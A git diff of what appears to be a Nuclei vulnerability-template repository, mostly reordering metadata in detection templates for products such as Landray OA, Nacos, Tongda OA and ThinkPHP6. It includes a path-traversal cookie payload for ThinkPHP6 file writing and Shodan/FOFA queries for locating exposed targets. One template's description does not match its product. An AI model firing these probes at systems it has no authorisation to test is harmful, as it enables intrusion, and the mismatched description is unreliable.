4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/landray-oa-datajson-rce.yaml b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml index 8009b379ca..84bcd25f77 100644 --- a/http/vulnerabilities/other/landray-oa-datajson-rce.yaml +++ b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml @@ -10,16 +10,16 @@ info: - https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py - https://github.com/hktalent/scan4all/blob/main/pocs_go/landray/Landray_RCE.go - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/landray-oa-datajson-rce.yaml + classification: + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="Landray-OA系统" - product: landray_office_automation vendor: landray + product: landray_office_automation + fofa-query: app="Landray-OA系统" tags: landray,rce,oast - classification: - cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* http: - raw: - | @@ -34,4 +34,4 @@ http: - 'contains(body, "success") && contains(body, "true")' condition: and -# digest: 4a0a00473045022100c30869e1159f66aa441618f804300e32d0f5e003de591285026347eb63d951c002205f79c7cabb94b71315630bae5dd5530c5d3d960c82fda96a8c318032743fe7a0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c30869e1159f66aa441618f804300e32d0f5e003de591285026347eb63d951c002205f79c7cabb94b71315630bae5dd5530c5d3d960c82fda96a8c318032743fe7a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/nacos-auth-bypass.yaml b/http/vulnerabilities/other/nacos-auth-bypass.yaml index 23e9ae3523..2e391354a1 100644 --- a/http/vulnerabilities/other/nacos-auth-bypass.yaml +++ b/http/vulnerabilities/other/nacos-auth-bypass.yaml @@ -10,16 +10,16 @@ info: - https://github.com/alibaba/nacos/issues/4593 - https://nacos.io/en-us/docs/auth.html - https://zhuanlan.zhihu.com/p/602021283 + classification: + cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: app="NACOS" - product: nacos vendor: alibaba + product: nacos + fofa-query: app="NACOS" tags: nacos,auth-bypass - classification: - cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* http: - method: GET path: @@ -50,4 +50,4 @@ http: status: - 200 -# digest: 4a0a0047304502202b019d11f851ba086249eb599d33d954df8b7d187cd300f88ab2639133156576022100c194e804a32b976dafd47deb537e3152e22a552fdda4628fcdf29fa49fbfa67f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202b019d11f851ba086249eb599d33d954df8b7d187cd300f88ab2639133156576022100c194e804a32b976dafd47deb537e3152e22a552fdda4628fcdf29fa49fbfa67f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/ncast-lfi.yaml b/http/vulnerabilities/other/ncast-lfi.yaml index a811570c7e..d28f799e5e 100644 --- a/http/vulnerabilities/other/ncast-lfi.yaml +++ b/http/vulnerabilities/other/ncast-lfi.yaml @@ -8,16 +8,16 @@ info: Ncast HD intelligent recording and broadcasting system has an arbitrary file reading vulnerability. reference: - https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md - metadata: - fofa-query: app="Ncast-产品" && title=="高清智能录播系统" - verified: true - max-request: 1 - product: ncast - vendor: ncast_project - tags: ncast,lfi - classification: cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: ncast_project + product: ncast + fofa-query: app="Ncast-产品" && title=="高清智能录播系统" + tags: ncast,lfi + http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3ccb20d4d2894d7ad538e05b308dd310907922254ad4c9bda70fdb35a4209de02202ed3f40e27ef9ae92809083d6a8f7df2d7dc1c0cf4c9c7cb8cde61b8717159ff:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100c3ccb20d4d2894d7ad538e05b308dd310907922254ad4c9bda70fdb35a4209de02202ed3f40e27ef9ae92809083d6a8f7df2d7dc1c0cf4c9c7cb8cde61b8717159ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml index 93953b3839..497feb041e 100644 --- a/http/vulnerabilities/other/phpldapadmin-xss.yaml +++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml @@ -7,16 +7,16 @@ info: description: PHP LDAP Admin is vulnerable to XSS. reference: - https://twitter.com/GodfatherOrwa/status/1701392754251563477 + classification: + cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 9 - shodan-query: html:"phpLDAPadmin" - product: phpldapadmin vendor: phpldapadmin_project + product: phpldapadmin + shodan-query: html:"phpLDAPadmin" tags: php,phpldapadmin,xss - classification: - cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e27c144b3387000d31b66b220a2ab51cea738f7b9066353b5e5afbf37fbd28e1022046fa83095bb9d286c449a380d9ddc60bfdefc36834bbc36b92b44aadf795d76f:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e27c144b3387000d31b66b220a2ab51cea738f7b9066353b5e5afbf37fbd28e1022046fa83095bb9d286c449a380d9ddc60bfdefc36834bbc36b92b44aadf795d76f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/quick-cms-sqli.yaml b/http/vulnerabilities/other/quick-cms-sqli.yaml index 22f85898de..0e9c099f37 100644 --- a/http/vulnerabilities/other/quick-cms-sqli.yaml +++ b/http/vulnerabilities/other/quick-cms-sqli.yaml @@ -9,16 +9,16 @@ info: reference: - https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html - https://www.exploit-db.com/exploits/51910 + classification: + cpe: cpe:2.3:a:opensolution:quick.cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="Quick.Cms v6.7" - product: quick.cms vendor: opensolution + product: quick.cms + fofa-query: body="Quick.Cms v6.7" tags: packetstorm,quickcms,sqli,cms - classification: - cpe: cpe:2.3:a:opensolution:quick.cms:*:*:*:*:*:*:*:* http: - raw: - | @@ -30,6 +30,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -43,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0516e26a3f113f7baf075eb8ba22bd554e173c1c2e2a50a15bee0e119e29ff4022100bfc6c593c2d9e033481dd30cd15592aa7b431364edf678d51cc9d9c343cf5ecd:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100e0516e26a3f113f7baf075eb8ba22bd554e173c1c2e2a50a15bee0e119e29ff4022100bfc6c593c2d9e033481dd30cd15592aa7b431364edf678d51cc9d9c343cf5ecd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/sharp-printers-lfi.yaml b/http/vulnerabilities/other/sharp-printers-lfi.yaml index e723bf4250..080abea7ef 100644 --- a/http/vulnerabilities/other/sharp-printers-lfi.yaml +++ b/http/vulnerabilities/other/sharp-printers-lfi.yaml @@ -12,16 +12,16 @@ info: - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-lfi - https://jvn.jp/en/vu/JVNVU93051062/index.html - https://global.sharp/products/copier/info/info_security_2024-05.html + classification: + cpe: cpe:2.3:o:sharp:mx-3050v_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: "Set-Cookie: MFPSESSIONID=" - product: mx-3050v_firmware vendor: sharp + product: mx-3050v_firmware + shodan-query: "Set-Cookie: MFPSESSIONID=" tags: sharp,printer,lfi - classification: - cpe: cpe:2.3:o:sharp:mx-3050v_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100878bae1080c18655ce87b467103626ced8e1c8913101dcd255d13bdbe6416ed702200ff98fbdf4ae214323dc5b259c6e40f09345f7bd46605528276bb867c228ed48:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100878bae1080c18655ce87b467103626ced8e1c8913101dcd255d13bdbe6416ed702200ff98fbdf4ae214323dc5b259c6e40f09345f7bd46605528276bb867c228ed48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/slims-xss.yaml b/http/vulnerabilities/other/slims-xss.yaml index b13760eae3..7424d78998 100644 --- a/http/vulnerabilities/other/slims-xss.yaml +++ b/http/vulnerabilities/other/slims-xss.yaml @@ -8,16 +8,16 @@ info: SLIMS 9 was discovered to contain `destination` request parameter that copies the value of an HTML tag attribute which is encapsulated in double quotation marks. reference: - https://packetstormsecurity.com/files/170182/Senayan-Library-Management-System-9.4.0-Cross-Site-Scripting.html + classification: + cpe: cpe:2.3:a:slims:senayan_library_management_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"SLIMS" - product: senayan_library_management_system vendor: slims + product: senayan_library_management_system + shodan-query: http.html:"SLIMS" tags: senayan,packetstorm,xss,slims - classification: - cpe: cpe:2.3:a:slims:senayan_library_management_system:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4a0a00473045022067fa72aee5273ee28057be28dcdc5eb5e948ab16cd778c9293e4fca13a2c7777022100eb1ec1320e495b673c5977dc83c6d3d0b33ab32471e043bcf5c2e9ab2ee98c78:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022067fa72aee5273ee28057be28dcdc5eb5e948ab16cd778c9293e4fca13a2c7777022100eb1ec1320e495b673c5977dc83c6d3d0b33ab32471e043bcf5c2e9ab2ee98c78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/tekon-info-leak.yaml b/http/vulnerabilities/other/tekon-info-leak.yaml index c84e491059..c8b56f2857 100644 --- a/http/vulnerabilities/other/tekon-info-leak.yaml +++ b/http/vulnerabilities/other/tekon-info-leak.yaml @@ -7,15 +7,15 @@ info: description: A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device reference: - https://medium.com/@bertinjoseb/post-auth-rce-based-in-malicious-lua-plugin-script-upload-scada-controllers-located-in-russia-57044425ac38 - metadata: - max-request: 1 - shodan-query: title:"контроллер" - product: kio_firmware - vendor: tekon - tags: tekon,exposure,unauth - classification: cpe: cpe:2.3:o:tekon:kio_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: tekon + product: kio_firmware + shodan-query: title:"контроллер" + tags: tekon,exposure,unauth + http: - method: GET path: @@ -41,4 +41,4 @@ http: status: - 200 -# digest: 4b0a00483046022100a57eb472f2a72479eb5ca9ad13b3b597f6e62dae0dcd631fd8cb96a1800c56fa022100ce652d5d520a1d37a0a0aed2f4c3a784a599a7aed0210bafb268def1b0c305b0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a57eb472f2a72479eb5ca9ad13b3b597f6e62dae0dcd631fd8cb96a1800c56fa022100ce652d5d520a1d37a0a0aed2f4c3a784a599a7aed0210bafb268def1b0c305b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml index ddb6e9ecc7..ecc937a5d8 100644 --- a/http/vulnerabilities/other/tendat-credential.yaml +++ b/http/vulnerabilities/other/tendat-credential.yaml @@ -8,16 +8,16 @@ info: A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. reference: - https://github.com/wy876/POC/blob/main/Tenda%E8%B7%AF%E7%94%B1%E5%99%A8%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2.md + classification: + cpe: cpe:2.3:h:tendacn:g0:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: "title=\"Tenda | LOGIN\" && country=\"CN\"" - product: g0 vendor: tendacn + product: g0 + fofa-query: "title=\"Tenda | LOGIN\" && country=\"CN\"" tags: tendat,exposure,config - classification: - cpe: cpe:2.3:h:tendacn:g0:*:*:*:*:*:*:*:* http: - raw: - | @@ -31,4 +31,5 @@ http: - 'contains(header, "config/conf")' - 'status_code == 200' condition: and -# digest: 4a0a0047304502203ba10e73cf7926fd3191fc939e73a82956db5b16b974060a41ae68acd058c79e0221009c8cc3c80539490789631dde1b5ef173d103159cb4b44b954d5e3067fa800cb0:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502203ba10e73cf7926fd3191fc939e73a82956db5b16b974060a41ae68acd058c79e0221009c8cc3c80539490789631dde1b5ef173d103159cb4b44b954d5e3067fa800cb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/ups-network-lfi.yaml b/http/vulnerabilities/other/ups-network-lfi.yaml index 9d3b9c02a1..5584f6e38a 100644 --- a/http/vulnerabilities/other/ups-network-lfi.yaml +++ b/http/vulnerabilities/other/ups-network-lfi.yaml @@ -9,16 +9,16 @@ info: reference: - https://packetstormsecurity.com/files/177626/upsnmc4-traversal.txt - https://www.exploit-db.com/exploits/51897 + classification: + cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"UPS Network Management Card 4" - product: netman_204_firmware vendor: riello-ups + product: netman_204_firmware + shodan-query: html:"UPS Network Management Card 4" tags: packetstorm,ups,lfi - classification: - cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220030ad51cd46365526c86d1c114c09d25c8b25e75e4cb8974540a86137d618aa9022100f81c523e69c96d236741b7d852b8ae9b1de9b44cfed01e2e7b7202473e13034e:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220030ad51cd46365526c86d1c114c09d25c8b25e75e4cb8974540a86137d618aa9022100f81c523e69c96d236741b7d852b8ae9b1de9b44cfed01e2e7b7202473e13034e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/webpagetest-ssrf.yaml b/http/vulnerabilities/other/webpagetest-ssrf.yaml index 695e3c1af2..7a570f2e1b 100644 --- a/http/vulnerabilities/other/webpagetest-ssrf.yaml +++ b/http/vulnerabilities/other/webpagetest-ssrf.yaml @@ -8,16 +8,16 @@ info: reference: - https://thinkloveshare.com/hacking/preauth_remote_code_execution_web_page_test/ - https://github.com/WPO-Foundation/webpagetest + classification: + cpe: cpe:2.3:a:webpagetest:webpagetest:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"WebPageTest" - product: webpagetest vendor: webpagetest + product: webpagetest + shodan-query: title:"WebPageTest" tags: ssrf,webpagetest,oast - classification: - cpe: cpe:2.3:a:webpagetest:webpagetest:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a00473045022100e12c24463f9cca14f59a4f37ff3d86746a9574eff83546d598127763f2ade55402202feb4e13391e119d2a56c67661132463d7c58ea74344e8c03a331d10bcd28f06:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e12c24463f9cca14f59a4f37ff3d86746a9574eff83546d598127763f2ade55402202feb4e13391e119d2a56c67661132463d7c58ea74344e8c03a331d10bcd28f06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/xxljob-executor-unauth.yaml b/http/vulnerabilities/other/xxljob-executor-unauth.yaml index cec0ef4ec6..b569e98f9b 100644 --- a/http/vulnerabilities/other/xxljob-executor-unauth.yaml +++ b/http/vulnerabilities/other/xxljob-executor-unauth.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/jas502n/xxl-job/blob/main/README.md - https://github.com/vulhub/vulhub/blob/master/xxl-job/unacc/README.md + classification: + cpe: cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: app="XXL-JOB" - product: xxl-job vendor: xuxueli + product: xxl-job + fofa-query: app="XXL-JOB" tags: xxljob,unauth,misconfig,rce - classification: - cpe: cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:* http: - raw: - | @@ -82,4 +82,4 @@ http: words: - "dns" -# digest: 4a0a0047304502201267f2958b6162f2a27bae7de33cd563307d68254c033642718abe971f52b2fa022100e392c7bb7e02c9d281798ee931978e2acfc754dd18a8c6f2668d146b73a0fd4d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201267f2958b6162f2a27bae7de33cd563307d68254c033642718abe971f52b2fa022100e392c7bb7e02c9d281798ee931978e2acfc754dd18a8c6f2668d146b73a0fd4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/phpmyadmin-unauth.yaml b/http/vulnerabilities/phpmyadmin-unauth.yaml index 7619927a38..4d85a4a4e5 100644 --- a/http/vulnerabilities/phpmyadmin-unauth.yaml +++ b/http/vulnerabilities/phpmyadmin-unauth.yaml @@ -7,17 +7,17 @@ info: description: Unauthenticated Access to phpmyadmin dashboard. reference: - https://www.phpmyadmin.net + classification: + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 + vendor: phpmyadmin + product: phpmyadmin shodan-query: html:"server_databases.php" fofa-query: body="server_databases.php" - product: phpmyadmin - vendor: phpmyadmin tags: misconfig,phpmyadmin,unauth - classification: - cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* http: - raw: - | @@ -61,4 +61,4 @@ http: status: - 200 -# digest: 4b0a00483046022100f148d3a4543cbbe95e69b1ab8831ec6307974affb8c6c94dc6a5dd5169a54f08022100f20348ed33d7e10c8c5fcbff2e1821a1b18e377eb0da77b40390923edc9e1bb9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f148d3a4543cbbe95e69b1ab8831ec6307974affb8c6c94dc6a5dd5169a54f08022100f20348ed33d7e10c8c5fcbff2e1821a1b18e377eb0da77b40390923edc9e1bb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/ruijie/ruijie-password-leak.yaml b/http/vulnerabilities/ruijie/ruijie-password-leak.yaml index fa0280d64b..ff4cd3fff8 100644 --- a/http/vulnerabilities/ruijie/ruijie-password-leak.yaml +++ b/http/vulnerabilities/ruijie/ruijie-password-leak.yaml @@ -10,16 +10,16 @@ info: - https://forum.butian.net/share/177 - https://www.ruijie.com.cn/gy/xw-aqtg-zw/86924/ - https://www.cnvd.org.cn/flaw/show/CNVD-2021-14536 + classification: + cpe: cpe:2.3:o:ruijie:rg-uac_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"Get_Verify_Info" - product: rg-uac_firmware vendor: ruijie + product: rg-uac_firmware + shodan-query: http.html:"Get_Verify_Info" tags: password,leak,ruijie,exposure,firewall,router - classification: - cpe: cpe:2.3:o:ruijie:rg-uac_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -44,4 +44,4 @@ http: regex: - '"password":"[a-f0-9]{32}' -# digest: 4a0a00473045022100ad8282043940d24e4d17f325901dcf37716cb6e52ca87cbba8b52b058e6a5e7b022068bd867a83a8518a891d99021df48a2f6a63da2875b78e7ff16f140917938b39:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ad8282043940d24e4d17f325901dcf37716cb6e52ca87cbba8b52b058e6a5e7b022068bd867a83a8518a891d99021df48a2f6a63da2875b78e7ff16f140917938b39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml index e4315e3f97..294aae3251 100644 --- a/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml +++ b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml @@ -8,16 +8,16 @@ info: Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter. reference: - https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/ + classification: + cpe: cpe:2.3:a:sangfor:next-gen_application_firewall:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="SANGFOR | NGAF" - product: next-gen_application_firewall vendor: sangfor + product: next-gen_application_firewall + fofa-query: title="SANGFOR | NGAF" tags: sangfor,lfi - classification: - cpe: cpe:2.3:a:sangfor:next-gen_application_firewall:*:*:*:*:*:*:*:* http: - raw: - | @@ -43,4 +43,4 @@ http: status: - 200 -# digest: 490a0046304402202cfdd0a7a3b428ae596b4c3c2585bdfca6af1d52d6bae1bd48607673cfcf61a702201405d5b3d2ba9179e851823ff6f7839a50c368493c42717e9dfb1fce07963e22:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202cfdd0a7a3b428ae596b4c3c2585bdfca6af1d52d6bae1bd48607673cfcf61a702201405d5b3d2ba9179e851823ff6f7839a50c368493c42717e9dfb1fce07963e22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml b/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml index efdba7bf31..2867676b2e 100644 --- a/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml +++ b/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml @@ -9,16 +9,16 @@ info: reference: | - https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273 - https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded + classification: + cpe: cpe:2.3:a:sitecore:sitecore.net:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 - shodan-query: html:"Sitecore" - product: sitecore.net vendor: sitecore + product: sitecore.net + shodan-query: html:"Sitecore" tags: xss,sitecore,cms - classification: - cpe: cpe:2.3:a:sitecore:sitecore.net:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4a0a00473045022050a33d1e8d168b7a9ba886b1f58923cc292c3a53bc0d5c3eab7fa010ac80a5a4022100c2f3d55ef7064d8b24c06eecf38ee7308b5f5d8c5b18284c03fca9553631f311:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022050a33d1e8d168b7a9ba886b1f58923cc292c3a53bc0d5c3eab7fa010ac80a5a4022100c2f3d55ef7064d8b24c06eecf38ee7308b5f5d8c5b18284c03fca9553631f311:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/thinkphp6-arbitrary-write.yaml b/http/vulnerabilities/thinkphp6-arbitrary-write.yaml index 8ae1c5dddd..da93d93c19 100644 --- a/http/vulnerabilities/thinkphp6-arbitrary-write.yaml +++ b/http/vulnerabilities/thinkphp6-arbitrary-write.yaml @@ -10,16 +10,15 @@ info: - https://community.f5.com/t5/technical-articles/thinkphp-6-0-0-6-0-1-arbitrary-file-write-vulnerability/ta-p/281591 - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write - https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-v6-file-write.yaml + classification: + cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"ThinkPHP" - product: thinkphp vendor: thinkphp + product: thinkphp + shodan-query: title:"ThinkPHP" tags: thinkphp,file-upload,rce - - classification: - cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* variables: random_filename: "{{to_lower(rand_base(11))}}" @@ -30,7 +29,6 @@ http: Host: {{Hostname}} Cookie: PHPSESSID=/../../../public/{{random_filename}}.php Content-Type: application/x-www-form-urlencoded - - | GET /{{random_filename}}.php HTTP/1.1 Host: {{Hostname}} @@ -45,4 +43,5 @@ http: - type: dsl dsl: - "status_2 == 200" -# digest: 4b0a00483046022100f8d2dcd7ab599a92095428ff31bc7a4a3c09befacc814c2804ca8ff7a0a62635022100d876802d930054655ca2299f666120809dfd8976e6a6c5f4992c3ec715be665a:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f8d2dcd7ab599a92095428ff31bc7a4a3c09befacc814c2804ca8ff7a0a62635022100d876802d930054655ca2299f666120809dfd8976e6a6c5f4992c3ec715be665a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml index 11df35d3dc..16fab7f8bc 100755 --- a/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml +++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml @@ -9,16 +9,15 @@ info: reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20action_upload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md - https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: app="TDXK-通达OA" - product: office_anywhere_2017 vendor: tongda2000 + product: office_anywhere_2017 + fofa-query: app="TDXK-通达OA" tags: tongda,fileupload,intrusive,router - - classification: - cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:* variables: string: "tongda-action-uploadfile" @@ -69,4 +68,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022042e581b6843ee7348560b8fe21246c3b7751969e2afa7f1fd73c390020032c1e0220789abf641572fc5db8ec7d2db073b66ccdf3122620c04fa572349b59257e5fe0:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022042e581b6843ee7348560b8fe21246c3b7751969e2afa7f1fd73c390020032c1e0220789abf641572fc5db8ec7d2db073b66ccdf3122620c04fa572349b59257e5fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-auth-bypass.yaml b/http/vulnerabilities/tongda/tongda-auth-bypass.yaml index bf1848e84b..82dec853eb 100644 --- a/http/vulnerabilities/tongda/tongda-auth-bypass.yaml +++ b/http/vulnerabilities/tongda/tongda-auth-bypass.yaml @@ -8,18 +8,18 @@ info: Tongda OA is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., LTD v11.7 has the interface query online user function, when the user is online, it will return PHPSESSION so that it can log in to the background system. reference: - https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/ + classification: + cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* metadata: verified: true max-request: 200 + vendor: tongda2000 + product: office_anywhere shodan-query: title:"通达OA" fofa-query: title="通达OA" zoomeye-query: app:"通达OA" - product: office_anywhere - vendor: tongda2000 tags: tongda,auth-bypass,fuzz - classification: - cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:* http: - raw: - | @@ -41,4 +41,5 @@ http: - "status_code_1 == 200 && status_code_2 == 200" - "contains(body_2,'user_id:') && contains(body_2,'user_name:') && contains(body_2,'var loginUser')" condition: and -# digest: 4a0a00473045022100cf6eb6c3146832a9fd31f8913265b52fc3f58057391d7f8f553d6c50c1fd2de002200254175ba248dd65f2ebf2ed5c9337787d304c2c1222925bd65b7b993550cf9b:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100cf6eb6c3146832a9fd31f8913265b52fc3f58057391d7f8f553d6c50c1fd2de002200254175ba248dd65f2ebf2ed5c9337787d304c2c1222925bd65b7b993550cf9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml index db333b3ca3..5ea25cd894 100755 --- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml +++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml @@ -8,16 +8,16 @@ info: Tongda OA v11.6 insert parameters contain SQL injection vulnerabilities, through which attackers can obtain sensitive database information reference: - 